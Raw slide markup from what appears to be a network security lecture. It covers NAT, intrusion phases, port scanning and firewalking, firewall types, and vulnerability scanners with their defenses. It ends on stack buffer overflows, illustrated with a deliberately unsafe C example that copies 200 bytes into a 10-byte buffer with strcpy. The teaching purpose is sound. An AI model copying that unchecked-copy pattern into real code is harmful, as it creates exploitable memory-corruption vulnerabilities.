              <a:t>Mapping And Scanning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19957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Filter out outgoing ICMP traffic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Maybe allow for your ISP only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Network Address Translation</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="2800"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="2800"/>
              <a:t>(NAT)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4143830" y="4339775"/>
            <a:ext cx="914400" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse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268030" y="3234875"/>
            <a:ext cx="457200" cy="4572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7191830" y="4415975"/>
            <a:ext cx="457200" cy="4572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EF5F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DEF5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6506030" y="5177975"/>
            <a:ext cx="457200" cy="4572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EF5F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DEF5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7572830" y="5482775"/>
            <a:ext cx="457200" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse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EF5F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DEF5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3789877" y="6244775"/>
            <a:ext cx="53006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hosts with 192.168.0.0/16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762830" y="5166863"/>
            <a:ext cx="10768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1.2.3.4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324430" y="4796975"/>
            <a:ext cx="457200" cy="45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 flipH="1" rot="10800000">
            <a:off x="1781630" y="4720775"/>
            <a:ext cx="2362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00" name="Google Shape;300;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="638630" y="5288873"/>
            <a:ext cx="14011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8.9.10.11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 rot="-311795">
            <a:off x="2011031" y="4385184"/>
            <a:ext cx="2162890" cy="39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1.2.3.4</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="302" name="Google Shape;302;p32"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="4905830" y="3501575"/>
            <a:ext cx="23622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03" name="Google Shape;303;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-1213819">
            <a:off x="4727495" y="3303635"/>
            <a:ext cx="3106755" cy="39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192.168.13.73</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="304" name="Google Shape;304;p32"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4982030" y="3653975"/>
            <a:ext cx="22860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05" name="Google Shape;305;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-1213962">
            <a:off x="5049992" y="4064929"/>
            <a:ext cx="2488767" cy="39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 192.168.13.73</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="306" name="Google Shape;306;p32"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1781630" y="4873175"/>
            <a:ext cx="2362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07" name="Google Shape;307;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-311736">
            <a:off x="2086430" y="4981125"/>
            <a:ext cx="155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 1.2.3.4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NATs Work</a:t>
            </a:r>
            <a:endParaRPr sz="3600"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199570" y="1151467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For internal hosts to go out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B sends traffic to www.google.com</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-460375" lvl="1" marL="9731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NAT modifies the IP header </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>of this traffic</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-460375" lvl="2" marL="121126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100"/>
              <a:t>Source IP: B </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100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 sz="2100"/>
              <a:t>NAT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Source port: B’s chosen port Y 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 random port X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NAT remembers that whatever comes for it on port X should go to B on port Y</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-460375" lvl="1" marL="9731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Google replies, NAT modifies the IP header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Destination IP: NAT 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B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Destination port: X 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 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09600" y="2116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Intrusions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3921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Why do people break into computers?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Fame, profit, politics</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-2936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What type of people usually breaks into computers?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Used to be young hackers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Today mostly organized criminal, nation states and insiders</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-293688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 thought that this was a security course. Why are we learning about attacks?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-293688" lvl="1" marL="7921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We need to know minute details of attacks in order to be able to choose and configure good defenses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NATs Work</a:t>
            </a:r>
            <a:endParaRPr sz="3600"/>
          </a:p>
        </p:txBody>
      </p:sp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199570" y="1045631"/>
            <a:ext cx="856343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For public services offered by internal hosts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You advertise your web server A at NAT’s address (1.2.3.4 and port 80)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NAT remembers that whatever comes for it on port 80 should go to A on port 80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External clients send traffic to 1.2.3.4:80</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-460375" lvl="1" marL="9731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NAT modifies the IP header </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>of this traffic</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-460375" lvl="2" marL="121126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100"/>
              <a:t>Destination IP: NAT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100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 sz="2100"/>
              <a:t>A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Destination port: NAT’s port 80 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 A’s service port 80</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-460375" lvl="1" marL="9731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A replies, NAT modifies the IP header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Source IP: A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NAT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Source port: 80 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 80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NATs Work</a:t>
            </a:r>
            <a:endParaRPr sz="3600"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199570" y="1172629"/>
            <a:ext cx="856343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What if you have another Web server C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You advertise your web server A at NAT’s address (1.2.3.4 and port 55) – not a standard Web server port so clients must know to talk to a diff. port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NAT remembers that whatever comes for it on port 55 should go to C on port 80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External clients send traffic to 1.2.3.4:55</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-460375" lvl="1" marL="9731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NAT modifies the IP header </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>of this traffic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100"/>
              <a:t>Destination IP: NAT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100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C</a:t>
            </a:r>
            <a:endParaRPr sz="2100"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Destination port: NAT’s port 55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 C’s service port 80</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-460375" lvl="1" marL="9731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C replies, NAT modifies the IP header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Source IP: C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NAT, source port: 80 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-GB"/>
              <a:t> 55</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-460375" lvl="2" marL="12112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685800" y="2116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Port Scanning</a:t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381000" y="1109128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Finding applications that listen on ports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Send various packets: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Establish and tear down TCP connection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Half-open and tear down TCP connection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Send invalid TCP packets: FIN, Null, Xmas scan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Send TCP ACK packets – find firewall holes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Obscure the source – FTP bounce scans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UDP scans</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-457200" lvl="1" marL="979487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Find RPC applications</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-3810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Invalid TCP packet sending is called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400"/>
              <a:t>fingerprinting</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="336" name="Google Shape;336;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7190650" y="3910375"/>
            <a:ext cx="1219212" cy="114301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685800" y="8466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Port Scanning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381000" y="1227667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Set source port and address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To allow packets to pass through the firewall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To hide your source address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TCP fingerprinting to find out OS type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TCP standard does not specify how to handle invalid packets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Implementations differ a lot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6096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Port Scanning Tools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Nmap</a:t>
            </a:r>
            <a:endParaRPr sz="28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Unix and Windows application and GUI</a:t>
            </a:r>
            <a:endParaRPr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http://nmap.org/</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="000099"/>
              </a:solidFill>
            </a:endParaRPr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Various scan types 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Adjustable timing</a:t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5562600" y="3352800"/>
            <a:ext cx="1219200" cy="1143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685800" y="8466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Defenses Against Port Scanning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Close all unused ports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Remove all unnecessary services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Filter out all unnecessary traffic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Find openings before the attackers do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smart filtering, based on client’s IP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Firewalls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685800" y="1321962"/>
            <a:ext cx="7772400" cy="4939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Single entry/exit point to/from a network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Convenient to monitor traffic and detect security events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Convenient way to implement one policy for all machines on the network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Also single point of failure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Could be bypassed by a smart attacker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Does nothing for insider attacks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May not be able to address all attacks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Works best for attacks, which have clear signatures</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="365" name="Google Shape;365;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1502833" y="9101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Firewall Flavors (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ch 9.3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>)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685800" y="1321962"/>
            <a:ext cx="7772400" cy="4939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Allow some traffic and deny the rest or deny some traffic and allow the rest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Rules are usually matched in order, and the first match applies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Flavors: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Packet filters – stateless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Stateful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Application-level proxy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Circuit-level proxy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72" name="Google Shape;372;p41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1502833" y="9101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Packet Filters</a:t>
            </a:r>
            <a:endParaRPr/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685800" y="1321962"/>
            <a:ext cx="7772400" cy="4939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Match each packet based on its IP and transport header fields and direction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No concept of connections or application info</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="379" name="Google Shape;379;p42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1502833" y="9101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3" y="2867259"/>
            <a:ext cx="8458200" cy="28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Stateful Firewall</a:t>
            </a:r>
            <a:endParaRPr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685800" y="1321962"/>
            <a:ext cx="7772400" cy="4939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Match packets based on them being part of flows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Able to talk about TCP flow state (e.g., NEW, ESTABLISHED..)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Keep and update state for each flow</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="387" name="Google Shape;387;p43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1502833" y="9101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3" y="3514442"/>
            <a:ext cx="8458200" cy="28435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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1294510" y="3870886"/>
            <a:ext cx="940351" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="DEE8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8478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1" sz="1400">
              <a:solidFill>
                <a:srgbClr val="5584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1294511" y="4682680"/>
            <a:ext cx="1038050" cy="27699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NEW, EST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1294510" y="4308656"/>
            <a:ext cx="1038050" cy="27699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NEW, EST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1282299" y="5114094"/>
            <a:ext cx="1038050" cy="27699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NEW, EST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1294511" y="5506685"/>
            <a:ext cx="1038050" cy="27699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1282299" y="5889255"/>
            <a:ext cx="1038050" cy="27699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2753640" y="3560961"/>
            <a:ext cx="10380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- Modified</a:t>
            </a:r>
            <a:endParaRPr b="1"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09600" y="635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Intrusion Phases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81000" y="1524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Reconnaissance </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="2800"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="2800"/>
              <a:t>(target acquisition and info gathering)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Scanning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Initial access at OS, application or network level and potentially escalating privileges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Achieving intrusion goal (e.g., information theft, installing malware, DDoS, etc.)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Maintaining access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Covering tracks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title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr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Application Proxy</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp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685800" y="1321962"/>
            <a:ext cx="7772400" cy="4939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Acts as server to the outside clients, and as a client to inside servers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Receive, analyze and rebuild </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB" sz="2800"/>
              <a:t>application sessions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Can inspect application level data and payload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Can normalize application traffic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To deal with unpatched vulnerabilities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900FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>7 Layers: Physical → Data Link → Network → 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900FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	Transport → Session → Presentation → Application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900FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Internet = Network Layer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900FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Network Access = Data Link + Physical Layers</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="9900FF"/>
              </a:solidFill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1502833" y="9101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295" y="4172634"/>
            <a:ext cx="3340332" cy="268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Circuit-Level Proxy</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="409" name="Google Shape;409;p45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1321962"/>
            <a:ext cx="7772400" cy="4939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Acts as server to the outside clients, and as a client to inside servers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Receive, analyze and rebuild </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB" sz="2800"/>
              <a:t>transport connections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Does not inspect application level data nor payload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Usually used to allow internal </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="2800"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="2800"/>
              <a:t>users to reach outside after</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="2800"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="2800"/>
              <a:t>authentication</a:t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1502833" y="9101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293" y="4105418"/>
            <a:ext cx="3306496" cy="274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69333" y="42333"/>
            <a:ext cx="85936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Firewalk: Determining Firewall Rules</a:t>
            </a:r>
            <a:endParaRPr/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81000" y="1413933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Find out firewall rules for new connections (stateful) or for all packets (packet filter)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We don’t care about target machine, just about packet types that can get through the firewall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Find out distance to firewall using traceroute</a:t>
            </a:r>
            <a:endParaRPr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Send custom packets to arbitrary destination setting TTL=distance+1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If you receive ICMP_TIME_EXCEEDED </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="2400"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="2400"/>
              <a:t>message, the packet went through – now you know firewall lets in that type of packets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609600" y="127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Defenses Against Firewalking</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp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Filter out outgoing ICMP traffic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firewall proxies</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-533400" lvl="1" marL="8874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This defense works because a proxy recreates each packet including the TTL field</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-533400" lvl="1" marL="8874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The destination host would have to be set up to ignore messages that are not allowed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685800" y="635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Vulnerability Scanning</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="432" name="Google Shape;432;p48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The attacker knows OS and applications installed on live hosts</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-457200" lvl="0" marL="5794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He can now find for each combination</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="9223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Vulnerability exploits</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="9223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Common configuration errors</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="9223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Default configuration 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Vulnerability scanning tool uses a database of known vulnerabilities to generate packets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Vulnerability scanning is also used for sysadmin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685800" y="8466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Vulnerability Scanning Tools</a:t>
            </a:r>
            <a:endParaRPr/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SARA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http://www-arc.com/sara</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="000099"/>
              </a:solidFill>
            </a:endParaRPr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SAINT</a:t>
            </a:r>
            <a:endParaRPr sz="28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http://www.saintcorporation.com</a:t>
            </a:r>
            <a:endParaRPr sz="24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Nessus</a:t>
            </a:r>
            <a:endParaRPr sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-457200" lvl="1" marL="979487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http://www.nessus.or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g</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000099"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="000099"/>
              </a:solidFill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Defenses</a:t>
            </a:r>
            <a:endParaRPr sz="2800"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 sz="2800"/>
              <a:t>Close your ports and keep systems patched</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-3492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GB" sz="2800"/>
              <a:t>Find your vulnerabilities before the attackers do</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="000099"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="440" name="Google Shape;440;p49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6379745" y="1676400"/>
            <a:ext cx="1219200" cy="1143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>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="622299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At The End Of Scanning Phase </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="447" name="Google Shape;447;p50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1397004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has a list of “live” IP addresses </a:t>
            </a:r>
            <a:endParaRPr sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-533400" lvl="0" marL="63182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O</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800"/>
              <a:t>pen ports and applications at live machines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Some information about OS type and version of live machines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Some information about application versions at open ports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Information about network topology</a:t>
            </a:r>
            <a:endParaRPr sz="28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Information about firewall configuration</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="63182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685800" y="88899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Phase 3: Initial Access</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p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381000" y="1371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Exploit vulnerabilities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Exploits for a specific vulnerability can be downloaded from hacker sites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Skilled hackers write new exploits</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-3556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55" name="Google Shape;455;p51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3032125" y="3622675"/>
            <a:ext cx="3595688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vulnerability?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exploit?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title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="57814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Buffer Overflow Attacks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62" name="Google Shape;462;p52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="387005" y="12192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A buffer in the code can store limited amount of data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When more data is supplied from user input the buffer is overrun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GB" sz="2220"/>
              <a:t>User data overwrites some other area in memory, adjacent to the buffer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GB" sz="2220"/>
              <a:t>Can crash the application, pollute its data or cause run-time control to execute commands from user input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Buffer could be located on the stack, heap or data section of the process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This attack is specific to lower-level languages – assembly and C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GB" sz="2405"/>
              <a:t>Higher level languages restrict data types/operations but at the cost of efficiency/expressiveness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>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="26881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Stack Buffer Overflows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9" name="Google Shape;469;p53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="419100" y="1278175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Consider a function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void sample_function(char* s)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char buffer[10];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strcpy(buffer, s);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return;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indent="-4699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And a main program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void main()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int i;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char temp[200];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for(i=0; i&lt;200;i++) temp[i]=‘A’;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sample_function(temp);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return;</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-457200" lvl="1" marL="979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  <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="470" name="Google Shape;470;p53"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3294400" y="4432100"/>
            <a:ext cx="4491000" cy="15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53"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4418800" y="4432100"/>
            <a:ext cx="3366600" cy="68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53"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3289600" y="2222288"/>
            <a:ext cx="44958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53"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3518200" y="2679500"/>
            <a:ext cx="42672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53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6629388" y="3187375"/>
            <a:ext cx="2105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 is larger</a:t>
            </a:r>
            <a:b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we expected</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="475" name="Google Shape;475;p53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6497450" y="1278163"/>
            <a:ext cx="1524000" cy="228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53"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="66498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53"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="68022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53"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="69546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53"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="71070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3"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="72594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3"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="74118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3"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75642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3"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="77166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53"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7869050" y="1278163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53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4966000" y="6119150"/>
            <a:ext cx="38862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p53"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="51184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3"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="52708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53"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="54232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53"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="55756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3"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="57280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3"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="58804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3"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="60328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3"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="61852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3"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="63376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3"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="74806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53"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76330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53"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="77854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53"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="79378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3"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="80902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3"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="82426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3"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="83950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53"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="85474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3"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8699800" y="61191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53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6559850" y="5738150"/>
            <a:ext cx="692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Phase 1: Reconnaissance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Get a lot of information about intended target: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Learn how its network is organized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Learn any specifics about OS and applications running</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-457200" lvl="0" marL="5794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Through technical and non-technical means</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-457200" lvl="0" marL="5794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Usually, reconnaissance happens without target’s knowledge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No traffic/communication directly with the target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>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="3909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Stack Buffer Overflows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1" name="Google Shape;511;p54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="371700" y="1388325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Large input will be stored on the stack, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="2800"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="2800"/>
              <a:t>overwriting system information</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="512" name="Google Shape;512;p54"/>
